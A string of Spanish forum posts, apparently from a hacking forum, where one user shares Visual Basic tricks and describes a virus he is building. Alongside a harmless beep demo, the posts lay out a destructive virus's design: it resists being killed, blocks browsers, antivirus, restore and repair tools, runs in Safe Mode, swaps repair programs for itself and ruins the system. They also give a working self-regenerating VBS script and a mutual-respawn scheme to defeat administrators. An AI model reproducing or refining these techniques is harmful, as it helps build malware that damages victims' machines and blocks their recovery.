Mensajes

Código [Seleccionar] Expandir



Private Declare Function Beep Lib "kernel32" (ByVal dwFreq As Long, ByVal dwDuration As Long) As Long

Private Sub Command1_Click()
Call Sound1
End Sub

Private Sub Command2_Click()
Call Sound2
End Sub

Private Sub Command3_Click()
Call Sound3
End Sub

Public Function Sound1()
For i = 1 To 5
  Beep 700 * i, 450
Next i
End Function

Public Function Sound2()
Beep 4000, 3000
End Function

Public Function Sound3()
For i = 1 To 40
  Beep 75 * i, 60
Next i
End Function




Añadimos a nuestro formulario 3 Botones de comando (Command1, Command2 y Command3) y añadimos el siguiente código.

Esto nos hará sonar el altavoz interno del PC, he jugado con los bucles y valores para conseguir escalas musicales,  si alguien consigue hacer algun sonido más, k lo publike

prueba con esto:

Código [Seleccionar] Expandir


Dim x

x = Shell("notepad C:\hola.txt", vbNormalFocus) 'Abre un TXT
x = Shell("explorer http://www.google.com", vbNormalFocus) 'Abre una web
x = Shell("netstat > C:\adios.txt", vbNormalFocus) 'Ejecuta un comando msd y lo vuelca en un TXT


[El modulo de SURVIVE esta al 95% completado]

ASKATASUN el código que nos muestras sirve para ocultar el nombre del archivo de la barra de tareas, aunque hagas eso cualquier programa que permita gestionar procesos podrá finalizarlo sin problemas

EDIT:
El modulo de SURVIVE esta al 95% completado
El modulo de DESTROY esta al 80% completado

Solo falta que lo testee en mi máquina para ver si hay algún error, en unos dias abro un nuevo post para informarlo todo desde el principio

Anarko, como ya he dicho quiero que primero probeis el código compilado en alguna maquina virtual y ver si tiene algun falo. No soy perfecto y lo más seguro que al final alguien pueda finalizarlo, por eso digo que quien consiga aportarme alguna mejora, bug o algun dato, le ofreceré a cambio el código completo.

Si al final el código resulta infalible y no hay forma de saltarlo donaré el source a la web elhacker-net para que todo el mundo se lo pueda bajar, junto con su explicación y tal.

Pero vamos, creo que cuando lo termine más de uno encontrará alguna forma de saltarlo

[Modulo SURVIVE]

Bueno, con la salida de este post me estoy poniendo ahora mismo con la versión 2 del virus. Lo estoy estructurando en 2 modulos:

Modulo SURVIVE

Se encarga de que el proceso del virus nunca se finalice. Será inmune a cualquier gestor de procesos (como el que mencionabas del "spybot search & destroy") e incluso del propio administrador de procesos de Windows. Tampoco será afectado por el taskkill ni ningún programa similar

Para ello NO voy a reemplazar el taskkill.exe ni nada parecido, todo será através de un código algo complejo

También este modulo deniega que el usuario navegue por cualquier dominio de google (asi evitamos que el usuario use el buscador para buscar una posible vacuna), es más: El modulo se encarga de bloquear el internet explorer, opera y firefox, asi como outlook, mirc o messenger (ya sea de yahoo o msn) De esta manera dejamos el usuario "incomunicado" y no podrá buscar vacunas contra el virus.

El modulo se encarga tambien de bloquear cualquier intento de restauración del sistema, asi como la ejecucion de msconfig o cualquier otra utilidad que permita gestionar el funcionamiento del sistema (panel de control), bloquea el registro del sistema e incluso la consola de ms-dos.

Todos estos bloqueos los realiza sin eliminar los ejecutables ni infectarlos (regedit.exe, cmd.exe, ...) Usa un metodo alternativo y creo que bastante novedoso

Modulo 65% realizado

Modulo DESTROY

Este es el modulo que se encarga de destruir el sistema, dejandolo inservible. Tambien se encarga de modificar el sistema para que el virus se ejecute en cada inicio de sesión e incluso en "Modo a prueba de fallos". Como guinda final de este modulo: Permite que el virus se incruste en memoria cuando ejecutamos cualquier tipo de archivo pseudo-ejecutable, me explico:

Si el usuario ejecuta un exe, com, bat, vbs, reg, src, cmd o cualquier extensión que pueda generar un código de reparación (por ejemplo: vacuna.exe, vacuna.reg, ...) bloquea dicho ejecutable, lo descarga de la memoria e incrusta el código del virus en su lugar, de esta manera si el usuario ejecuta: vacuna.exe se descargará de la memoria y se ejecutara el virus.exe

EDIT: Se me olvidaba comentar una última cosa, es posible que algun usuario avispado pueda generar una vacuna contra este virus e intente incrustarla en archivo no-ejecutable, por ejemplo: Alguien podria pensar en crear la vacuna en javascript e incrustarlo dentro de un archivo HTML, no? Bueno pues decir que el virus tambien bloquea ese tipo de códigos (aunque esten embebidos en un HTML o CHM o cualquier otra cosa) Además como ya he dicho, los principales exploradores de internet estarán bloqueados (iexplorer, firefox y opera)



Modulo 40% realizado

=======================

He decidido dividirlo en 2 modulos para que cada uno coja el modulo que le interese más para sus propios proyectos.

=======================

El source de este virus lo pondré acceso al público pero bajo una condición. Los usuarios que me aporten mejoras al código, algun bug, o algún método por el cual el virus puede ser finalizado recibirá el source completo.

Para ello voy a colgar el virus compilado junto con la estructura interna del código (para que sepais como trabaja por dentro) y podais testearlo en vuestras máquinas virtuales.

¿Que os parece la idea?

correcto nerus, he puesto en practica lo del proceso A y B y realmente no funciona si matamos uno d elos 2 procesos 

Lo del VBS era una simple curiosidad, como bien he dicho si matamos el wscript.exe el script deja de funcionar y puede ser eliminado correctamente, pero en el caso de no matarlo, nuestro script se regeneraría en caso de ser eliminado. Solo era una simple curiosidad

==================

Hace poco más de 6 meses un amigo y yo nos embarcamos en un proyecto (llamado msn_h), dicho proyecto era un ejecutable que dejaba inserbible el sistema operativo actual, gozaba de rutinas para no ser descargado nunca de memoria, erá capaz de bloquear servicios de antivirus, ventanas de desinfección e incluso utilidades de reparación o restauración del sistema. dicho virus se ejecutaba incluso entrando en modo a prueba de fallos y por el momento no he encontrado un método efectivo que sea capaz de restaurar el sistema despues de ejecutar dicho programa.

Cuando termine la versión 2.0 la colgaré en este foro para que los usuarios se lo descarguen y lo prueben en sus máquinas virtuales, a ver si entre todo encontramos un método para eliminar el virus una vez ejecutado. Aviso que es muy complejo, ni yo mismo (su propio creador xD) he podido encontrar una vacuna contra él.

Repito que el virus era capaz de auto-ejecutarse en modo a prueba de fallos, cosa que no he visto nunca en ningún otro proyecto de VB

pon un msgbox en el evento LOAD y otro msgbox distinto en el evento INITIALIZED y mira cual de los 2 se ejecuta primero

Se me ha ocurrido otra manera que alomejor te puede ayudar:

Si dominas el lenguaje VBS podrás hacer un script que no se puede eliminar del disco duro mientras esté en ejecución, aqui esta el código:

Código [Seleccionar] Expandir


Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close

Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
  Set Myself = fso.createtextfile(wscript.scriptfullname, True)
   Myself.write MyCode
  Myself.Close
End If
Loop


El funcionamiento es simple, al ejecutar el script guarda en una variable su propio codigo MySelf y después entra en un bucle que comprueba si existe su propio fichero. En el caso de que no exista vuelve a crear un archivo de texto con su propio código dentro.

Copiar el código y lo pegais en un notepad, lo guardais como "prueba.vbs" y lo ejecutais. Después intentar eliminar el archivo,  verás como despues de eliminarlo se copia él solito y sigue ejecutándose.

Para eliminarlo tienes que matar el proceso "wscript.exe" y después eliminar el fichero

Ummm, lo que dices de crear un proceso con el nombre de LSASS.EXE funciona en cierta manera, es decir: Si pulsamos Ctrl+Alt+Supr e intentamos cerrar nuestro proceso de LSASS.EXE nos deniega el acceso, pero si ejecutamos el comando:

taskkill /F /IM lsass.exe

Lo cierra completamente...

Asi que este método tampoco funciona.

Te voy a proponer un método para hacer un proceso imortal:

==========================

Este metodo no lo he puesto en practica, yo te explico mi teoria que he diseñado, solo falta ponerlo en practica y ver si realmente funciona...

Hemos de crear un proyecto (llamémosle "A") que sea capaz de droppear (crear otro proceso en tiempo de ejecución) llamado "B"

Es decir, tendremos un programa A.exe que al ser ejecutado cree otro llamado B.exe

El A.exe tendrá una rutina en formato de bucle para mantener SIEMPRE el proceso B.exe activo

Código [Seleccionar] Expandir

x = Shell("B.exe",vbHide)

Y el proceso B.exe tendrá una rutina en formato bucle para mantener SIEMPRE el proceso A.exe abierto

Código [Seleccionar] Expandir

x = Shell("B.exe",vbHide)

Luego, en el evento Unload o Terminate del proceso A.exe pondremos una rutina que nos ejecute el proceso B.exe

Y en el evento Unoal o Terminate del proceso B.exe tendremos una rutina que nos ejecute el proceso A.exe

Bien, espero que quede un poco claro...

Ahora vamos a suponer (todo esto es teorico, repito que no lo he probado y no se si funcionaria)

Si algun admin mata el proceso A.exe (usando el administrador de tareas o taskkill) entonces el B.exe se ejecutará, y a su vez el B.exe ejecutará el A.exe

Si algun admin mata el proceso B.exe (usando el administrador de tareas o taskkill) entonces el A.exe se ejecutará, y a su vez el A.exe ejecutará el B.exe

======================

Repito que este método me lo he imaginado, es pura teoria solo falta crear los proyectos y ver que realmente se mantienen ejecutados.

Podriamos complejar un poco con un tercer proceso C.exe para asegurarnos de que todo funcione bien

Bueno, gracias a un aviso de un miembro del foro he arreglado los links del servidor, ahora podeis tener acceso al Manual NetBios y a la descarga del programa.

Para descargarte el programa tendrás que entrar dentro dle manual y descargarlo desde allí.

Recomiendo leer y entender el manual antes de usar el programa.


NOTA: No podrás establecer una conexión remota entre 2 equipos que no sean del mismo dominio, aunque tengas el pass correcto del Administrador. Usar este programa solo para descubrir que personas usan NetBios o en redes basadas en dominios.